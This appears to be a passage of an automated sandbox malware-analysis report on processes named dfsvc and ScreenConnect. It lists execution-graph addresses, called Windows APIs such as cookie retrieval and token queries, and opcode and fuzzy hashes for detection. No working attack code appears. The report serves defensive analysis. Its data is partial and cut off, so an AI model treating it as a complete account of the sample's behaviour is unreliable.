41939->41938 41940->41941 41942 7ff848e97700 LoadLibraryExW 41941->41942 41943 7ff848eb8fc6 41941->41943 41942->41943 41944 7ff848e84c90 LoadLibraryExW 41943->41944 41945 7ff848eb9010 41944->41945 41946 7ff848e84c90 LoadLibraryExW 41945->41946 41947 7ff848eb9043 41946->41947 41948 7ff848e84c90 LoadLibraryExW 41947->41948 41949 7ff848eb9073 41947->41949 41948->41949 41951 7ff848e97728 41950->41951 41956 7ff848e88fd0 41951->41956 41953 7ff848e97736 41954 7ff848e86858 LoadLibraryExW 41953->41954 41955 7ff848e97749 41954->41955 41955->41935 41959 7ff848e87cc0 41956->41959 41958 7ff848e88fe7 41960 7ff848e87cdd 41959->41960 41961 7ff848e87d3b 41960->41961 41963 7ff848e86ab0 41960->41963 41961->41958 41964 7ff848e86ab9 41963->41964 41965 7ff848e86c0d 41964->41965 41966 7ff848e86bbb 41964->41966 41967 7ff848e86c62 41965->41967 41968 7ff848e86c11 41965->41968 41969 7ff848e84c90 LoadLibraryExW 41966->41969 41970 7ff848e84c90 LoadLibraryExW 41967->41970 41971 7ff848e84c90 LoadLibraryExW 41968->41971 41975 7ff848e86bd5 41969->41975 41972 7ff848e86c7f 41970->41972 41971->41975 41973 7ff848e84c90 LoadLibraryExW 41972->41973 41974 7ff848e86c99 41973->41974 41976 7ff848e86de0 41974->41976 41980 7ff848e84c90 LoadLibraryExW 41974->41980 41977 7ff848e84c90 LoadLibraryExW 41975->41977 41983 7ff848e86c08 41975->41983 41987 7ff848e85990 41976->41987 41981 7ff848e86f57 41977->41981 41979 7ff848e86e20 41982 7ff848e84c90 LoadLibraryExW 41979->41982 41980->41976 41984 7ff848e85990 LoadLibraryExW 41981->41984 41982->41975 41983->41961 41985 7ff848e86f8f 41984->41985 41986 7ff848e84c90 LoadLibraryExW 41985->41986 41986->41983 41988 7ff848e83f30 LoadLibraryExW 41987->41988 41989 7ff848e859b4 41988->41989 41989->41979 42312 7ff848ec6414 42313 7ff848ec6420 42312->42313 42314 7ff848ec65d1 42313->42314 42315 7ff848e87cc0 LoadLibraryExW 42313->42315 42315->42313 42185 7ff848e8994b 42186 7ff848e89957 CreateFileW 42185->42186 42188 7ff848e89a8c 42186->42188 42051 7ff848eb2581 42052 7ff848eb258b 42051->42052 42053 7ff848e872b0 LoadLibraryExW 42052->42053 42054 7ff848eb25f6 42053->42054 42055 7ff848e84c90 LoadLibraryExW 42054->42055 42056 7ff848eb263e 42055->42056 42057 7ff848e85990 LoadLibraryExW 42056->42057 42059 7ff848eb2ee4 42056->42059 42058 7ff848eb273b 42057->42058 42060 7ff848e84c90 LoadLibraryExW 42058->42060 42061 7ff848eb2755 42060->42061 42062 7ff848e84c90 LoadLibraryExW 42061->42062 42063 7ff848eb2831 42062->42063 42063->42059 42064 7ff848eb284d 42063->42064 42066 7ff848eb288d 42063->42066 42065 7ff848e84c90 LoadLibraryExW 42064->42065 42069 7ff848eb2867 42065->42069 42066->42059 42067 7ff848e97700 LoadLibraryExW 42066->42067 42068 7ff848eb28c0 42066->42068 42067->42068 42068->42069 42070 7ff848e84c90 LoadLibraryExW 42068->42070 42072 7ff848e84c90 LoadLibraryExW 42069->42072 42071 7ff848eb296b 42070->42071 42073 7ff848e84c90 LoadLibraryExW 42071->42073 42076 7ff848eb2a53 42072->42076 42074 7ff848eb2985 42073->42074 42074->42069 42075 7ff848e97700 LoadLibraryExW 42074->42075 42075->42069 42076->42059 42077 7ff848e85990 LoadLibraryExW 42076->42077 42078 7ff848eb2ab7 42077->42078 42079 7ff848e84c90 LoadLibraryExW 42078->42079 42080 7ff848eb2ad1 42079->42080 42081 7ff848e84c90 LoadLibraryExW 42080->42081 42083 7ff848eb2aeb 42081->42083 42082 7ff848eb2ea6 42083->42082 42084 7ff848e85990 LoadLibraryExW 42083->42084 42084->42082 41995 7ff848ebcbbd 41997 7ff848ebcbc3 41995->41997 41999 7ff848e815f8 41997->41999 41998 7ff848ebcc6b 42001 7ff848e81601 41999->42001 42000 7ff848e81683 42000->41998 42001->42000 42002 7ff848e81802 LoadLibraryExW 42001->42002 42003 7ff848e81836 42002->42003 42003->41998 42004 7ff848ec04bd 42005 7ff848ec04c7 42004->42005 42006 7ff848e872b0 LoadLibraryExW 42005->42006 42007 7ff848ec051e 42006->42007 42008 7ff848e84c90 LoadLibraryExW 42007->42008 42009 7ff848ec0548 42008->42009 42010 7ff848e84c90 LoadLibraryExW 42009->42010 42011 7ff848ec0572 42010->42011 42012 7ff848e84c90 LoadLibraryExW 42011->42012 42013 7ff848ec059c 42012->42013 42014 7ff848e84c90 LoadLibraryExW 42013->42014 42015 7ff848ec05c6 42014->42015 42193 7ff848e8a83f 42194 7ff848e8a872 42193->42194 42195 7ff848e872b0 LoadLibraryExW 42194->42195 42196 7ff848e8a887 42195->42196 42212 7ff848e833c0 42196->42212 42198 7ff848e8a8bf 42199 7ff848e84c90 LoadLibraryExW 42198->42199 42200 7ff848e8aa53 42199->42200 42201 7ff848e8abc4 42200->42201 42204 7ff848e8aa5e 42200->42204 42202 7ff848e84c90 LoadLibraryExW 42201->42202 42208 7ff848e8ab58 42202->42208 42203 7ff848e84c90 LoadLibraryExW 42210 7ff848e8abf8 42203->42210 42205 7ff848e8ab34 42204->42205 42206 7ff848e8ab5d 42204->42206 42207 7ff848e84c90 LoadLibraryExW 42205->42207 42205->42208 42209 7ff848e84c90 LoadLibraryExW 42206->42209 42207->42208 42208->42203 42211 7ff848e8ab77 42209->42211 42216 7ff848e833c5 42212->42216 42213 7ff848e83774 42224 7ff848e83c81 42213->42224 42215 7ff848e8378e 42215->42198 42216->42213 42220 7ff848e82f80 42216->42220 42218 7ff848e8370a 42219 7ff848e82f80 LoadLibraryExW 42218->42219 42219->42213 42221 7ff848e858a0 42220->42221 42228 7ff848e82f00 42221->42228 42223 7ff848e85929 42223->42218 42225 7ff848e83cae 42224->42225 42232 7ff848e82e48 42225->42232 42227 7ff848e83d19 42227->42215 42229 7ff848e85990 42228->42229 42230 7ff848e83f30 LoadLibraryExW 42229->42230 42231 7ff848e859b4 42230->42231 42231->42223 42233 7ff848e83e70 42232->42233 42236 7ff848e83e8a 42233->42236 42238 7ff848e82e08 42233->42238 42235 7ff848e83ec9 42235->42227 42236->42235 42242 7ff848e82e30 42236->42242 42239 7ff848e83f30 42238->42239 42240 7ff848e815c8 LoadLibraryExW 42239->42240 42241 7ff848e83f55 42240->42241 42241->42236 42244 7ff848e82e35 42242->42244 42243 7ff848e82e59 42244->42243 42245 7ff848e82e08 LoadLibraryExW 42244->42245 42247 7ff848e83e8a 42244->42247 42245->42247 42246 7ff848e83ec9 42246->42235 42247->42246 42248 7ff848e82e30 LoadLibraryExW 42247->42248 42248->42246 42316 7ff848eb32fd 42317 7ff848eb3305 42316->42317 42318 7ff848eb337a 42317->42318 42324 7ff848eb3564 42317->42324 42319 7ff848e872b0 LoadLibraryExW 42318->42319 42320 7ff848eb33ef 42319->42320 42336 7ff848e8b530 42320->42336 42322 7ff848eb340a 42340 7ff848e98a10 42322->42340 42325 7ff848e84c90 LoadLibraryExW 42324->42325 42327 7ff848eb35fc 42325->42327 42326 7ff848eb3417 42326->42327 42328 7ff848eb3453 42326->42328 42329 7ff848e84c90 LoadLibraryExW 42327->42329 42330 7ff848eb34b6 42328->42330 42333 7ff848eb36de 42328->42333 42329->42333 42331 7ff848e84c90 LoadLibraryExW 42330->42331 42332 7ff848eb34f4 42330->42332 42331->42332 42335 7ff848eb3fcb 42333->42335 42357 7ff848e86050 42333->42357 42337 7ff848e8b555 42336->42337 42338 7ff848e872b0 LoadLibraryExW 42337->42338 42339 7ff848e8b56a 42338->42339 42339->42322 42341 7ff848e98a3d 42340->42341 42342 7ff848e872b0 LoadLibraryExW 42341->42342 42343 7ff848e98a82 42342->42343 42344 7ff848e84c90 LoadLibraryExW 42343->42344 42356 7ff848e98c6c 42343->42356 42345 7ff848e98b86 42344->42345 42346 7ff848e84c90 LoadLibraryExW 42345->42346 42348 7ff848e98bc2 42346->42348 42347 7ff848e98bcf 42350 7ff848e84c90 LoadLibraryExW 42347->42350 42348->42347 42361 7ff848e86018 42348->42361 42352 7ff848e98c02 42350->42352 42351 7ff848e98c23 42354 7ff848e84c90 LoadLibraryExW 42351->42354 42352->42351 42365 7ff848e86000 42352->42365 42355 7ff848e98c3d 42354->42355 42355->42326 42356->42326 42358 7ff848eb5ad0 42357->42358 42359 7ff848e9ecb0 LoadLibraryExW 42358->42359 42360 7ff848eb5ae4 42358->42360 42359->42360 42360->42333 42362 7ff848e8601d 42361->42362 42363 7ff848e9ecb0 LoadLibraryExW 42362->42363 42364 7ff848eb5ae4 42362->42364 42363->42364 42364->42347 42366 7ff848ea0f30 42365->42366 42367 7ff848e84c90 LoadLibraryExW 42366->42367 42369 7ff848ea1031 42366->42369 42368 7ff848ea101d 42367->42368 42368->42351 42369->42351

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF848E81548 Relevance: 1.8, APIs: 1, Instructions: 348COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925977816.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848e80000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5791b3442a72e5ab37a26a751a1a2a7d752b5a967dff395a8b46c2031debb756
                                                                                                                                                                                                                                                        • Instruction ID: 45793d6d940f102490ed32277574eb38468e9f144cd910e9cee8ac97685db931
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5791b3442a72e5ab37a26a751a1a2a7d752b5a967dff395a8b46c2031debb756
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7B13531E0DA895FE749EB7858192BD3BE1FF56750F8841BAC009C7293EF3AA8058345
                                                                                                                                                                                                                                                        Function 00007FF848E8E8D2 Relevance: 1.8, APIs: 1, Instructions: 279networkCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 3076 7ff848e8e8d2-7ff848e8e998 3080 7ff848e8e9a5-7ff848e8e9aa 3076->3080 3081 7ff848e8e99a-7ff848e8e9a2 3076->3081 3082 7ff848e8e9b7-7ff848e8e9c3 3080->3082 3083 7ff848e8e9ac-7ff848e8e9b4 3080->3083 3081->3080 3084 7ff848e8ea49-7ff848e8ea50 3082->3084 3085 7ff848e8e9c9-7ff848e8e9fc 3082->3085 3083->3082 3086 7ff848e8ea6b-7ff848e8eac7 InternetGetCookieW 3084->3086 3092 7ff848e8ea52-7ff848e8ea58 3085->3092 3093 7ff848e8e9fe-7ff848e8ea00 3085->3093 3088 7ff848e8eac9 3086->3088 3089 7ff848e8eacf-7ff848e8eae2 3086->3089 3088->3089 3090 7ff848e8eae4-7ff848e8eb06 3089->3090 3091 7ff848e8eb07-7ff848e8eb39 call 7ff848e8eb55 3089->3091 3090->3091 3104 7ff848e8eb40-7ff848e8eb54 3091->3104 3105 7ff848e8eb3b 3091->3105 3100 7ff848e8ea5a-7ff848e8ea66 3092->3100 3094 7ff848e8ea02-7ff848e8ea14 3093->3094 3095 7ff848e8ea39-7ff848e8ea47 3093->3095 3098 7ff848e8ea16 3094->3098 3099 7ff848e8ea18-7ff848e8ea2b 3094->3099 3095->3100 3098->3099 3099->3099 3103 7ff848e8ea2d-7ff848e8ea35 3099->3103 3100->3086 3103->3095 3105->3104
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925977816.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848e80000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CookieInternet
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 930238652-0
                                                                                                                                                                                                                                                        • Opcode ID: 86a3a226304ed89c5081f50aa56f6a2b88f7f0fb1351bbbb7a3e869969555de6
                                                                                                                                                                                                                                                        • Instruction ID: 0b07f7f41115f13b4c6771d7344f61a5119b3f51db1b871bfdaa35232ff25c1d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86a3a226304ed89c5081f50aa56f6a2b88f7f0fb1351bbbb7a3e869969555de6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F791AE3090CB8D8FDBA9EF2888557E93BE1FF59311F04426ED84DC7292CB74A9458B91
                                                                                                                                                                                                                                                        Function 00007FF848E8994B Relevance: 1.7, APIs: 1, Instructions: 180fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925977816.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848e80000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 2e2229a44f3c8b8cc1a80da44451201949094f84e4a48373728de29b217a9859
                                                                                                                                                                                                                                                        • Instruction ID: 86be438aed7f3e3332423e45b52edc236ffbba2581d4de0a25a8bff8be0ecae3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e2229a44f3c8b8cc1a80da44451201949094f84e4a48373728de29b217a9859
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B519E7190CA5C9FDB58EF6C9845BE9BBE0FB69310F1442AEE04DD3252CB34A845CB85
                                                                                                                                                                                                                                                        Function 00007FF848D6EEBF Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2925323794.00007FF848D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D6D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff848d6d000_dfsvc.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 91ef96244ae9f08e1ff5005bd46d31fbe18f0433539387f821c51647dd0bf9cb
                                                                                                                                                                                                                                                        • Instruction ID: 99ece7221385deedfa7b9056819870b1bc9b4bb36d7633773cd3d0e883741e47
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91ef96244ae9f08e1ff5005bd46d31fbe18f0433539387f821c51647dd0bf9cb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E441183180DBC84FE756DB3898559523FF0EF57360B1505DFE088CB1A7DA25A84AC7A2

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:13.6%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                                                                                        execution_graph 14638 7ff848e88414 14640 7ff848e8841d 14638->14640 14639 7ff848e88482 14640->14639 14641 7ff848e884f6 SetProcessMitigationPolicy 14640->14641 14642 7ff848e88552 14641->14642 14634 7ff848e9f219 14635 7ff848e9f223 GetTokenInformation 14634->14635 14637 7ff848e9f2d7 14635->14637 14630 7ff848e9f458 14631 7ff848e9f46f CloseHandle 14630->14631 14633 7ff848e9f4eb 14631->14633 14643 7ff848e8f67b 14644 7ff848e8f687 CreateFileW 14643->14644 14646 7ff848e8f7bc 14644->14646

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF848E88414 Relevance: 1.7, APIs: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: cd7e11de9326c0d4ae5e55de24395864c8be8aad3ec04d5aee945cf76b56db76
                                                                                                                                                                                                                                                        • Instruction ID: 68acbdabfd396a180ca32166551bcdef9e2d742f118ec158871c586e9923d162
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd7e11de9326c0d4ae5e55de24395864c8be8aad3ec04d5aee945cf76b56db76
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E414631C0CB588FDB18ABA8984A5F97BE0EF55351F04017FE449C3292DB78A8468796
                                                                                                                                                                                                                                                        Function 00007FF848E8F67B Relevance: 1.7, APIs: 1, Instructions: 178fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 865 7ff848e8f67b-7ff848e8f710 870 7ff848e8f712-7ff848e8f717 865->870 871 7ff848e8f71a-7ff848e8f7ba CreateFileW 865->871 870->871 873 7ff848e8f7c2-7ff848e8f7f5 871->873 874 7ff848e8f7bc 871->874 874->873
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 855531be70444d8ad3b2d4e1355fbb2abef306e77de07c47b7980e229a19cd58
                                                                                                                                                                                                                                                        • Instruction ID: f9c5819c9ab8cc7b6d737d3c632360cc41ed0dcd623c3e372d2874bcfa8aea8f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 855531be70444d8ad3b2d4e1355fbb2abef306e77de07c47b7980e229a19cd58
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9651C07191CA5C9FDB58EF689845BE8BBE0FB59310F1442AEE44DD3252CB34A845CB81
                                                                                                                                                                                                                                                        Function 00007FF848E9F219 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 876 7ff848e9f219-7ff848e9f2d5 GetTokenInformation 880 7ff848e9f2d7 876->880 881 7ff848e9f2dd-7ff848e9f30e 876->881 880->881
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                                                                                                                                        • Opcode ID: fc8209a9ff66a9cec04ca1574bf70c73dafdc13a0cae817470506d6833a7aa8e
                                                                                                                                                                                                                                                        • Instruction ID: 05eaa82d666f31d8375909e2264b48d4fbc5e873484954e85d72cdffae6c5f17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc8209a9ff66a9cec04ca1574bf70c73dafdc13a0cae817470506d6833a7aa8e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F31F63180CB589FDB08DF5CD8096F97BE0EB99321F04426FE089D3252DB74A806CB96
                                                                                                                                                                                                                                                        Function 00007FF848E84982 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 883 7ff848e84982-7ff848e9f266 885 7ff848e9f26d-7ff848e9f2d5 GetTokenInformation 883->885 886 7ff848e9f2d7 885->886 887 7ff848e9f2dd-7ff848e9f30e 885->887 886->887
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                                                                                                                                        • Opcode ID: a18e73279bb943f44ddf5861125d683118d4ece5680e6713791f8aa3930c4a2a
                                                                                                                                                                                                                                                        • Instruction ID: eaf561fb0beeff3c6a88d6ef4ddf378fb0cef2d2e355394b0fce2b1a40ee77f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a18e73279bb943f44ddf5861125d683118d4ece5680e6713791f8aa3930c4a2a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1531F67191CB189FDB18DF9CD8466FD77E0FBA9325F00422EE049D3251DB74A8068B96
                                                                                                                                                                                                                                                        Function 00007FF848E9F458 Relevance: 1.4, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.2427855090.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff848e80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        • Opcode ID: f1b3dee2a8d0b6d364113c5491394c9035168f0691b4bd435d100a29e1de8b0e
                                                                                                                                                                                                                                                        • Instruction ID: d126c41c5430452702dc5525eeeed3dfcf29ea6dac080c188bcf1766578b8425
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1b3dee2a8d0b6d364113c5491394c9035168f0691b4bd435d100a29e1de8b0e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A21D13190CA5C9FDB58EB9884497F9BBE0FF65321F00422FD049D3252DB75A856CB91

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 02A720B5 Relevance: 2.9, Strings: 2, Instructions: 374COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCuq$
                                                                                                                                                                                                                                                        • API String ID: 0-3867085953
                                                                                                                                                                                                                                                        • Opcode ID: 5a20973bda67a77dc454987ea6c6e4be2771ad4be48aa2f0f375f99760284528
                                                                                                                                                                                                                                                        • Instruction ID: 9286e74aeb1de043bcc1e7d7573dfba8b71809faeb1ca0cfa9966af75f914b9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a20973bda67a77dc454987ea6c6e4be2771ad4be48aa2f0f375f99760284528
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8519A357402018FC715EB39D9A4BAE7BE6AF89314B1484B9D40ADB265EF34DC06CB91
                                                                                                                                                                                                                                                        Function 02A71828 Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q$$]q
                                                                                                                                                                                                                                                        • API String ID: 0-127220927
                                                                                                                                                                                                                                                        • Opcode ID: 0039ea04f3a683e99abe6a302c2af56b2e804fe6f68b113ba6c84ad5641e20c4
                                                                                                                                                                                                                                                        • Instruction ID: c696dec07b1f7f27aaf7ccc383a94fbe35dce572b8c8123099d08e25b22160f4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0039ea04f3a683e99abe6a302c2af56b2e804fe6f68b113ba6c84ad5641e20c4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2301D130A003048FC7299F78D848A297BB5EF4622671648AAE81ACB266CF35DC06CB54
                                                                                                                                                                                                                                                        Function 02A75238 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        • Opcode ID: cbfab85c297775911f5a43e06121e2c97ee78339054768ee0e9adaf8b8470d61
                                                                                                                                                                                                                                                        • Instruction ID: b8b74b5dac5ddf6f4616c990a08058a8822a4af788f5dbd866337d433b88ecc6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbfab85c297775911f5a43e06121e2c97ee78339054768ee0e9adaf8b8470d61
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E61F834B106058FCB14DFA9D994A5EB7F6FF8D315B5085A8E906AB365DB30EC02DB80
                                                                                                                                                                                                                                                        Function 02A76F42 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000A.00000002.2419987449.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_2a70000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: LR]q
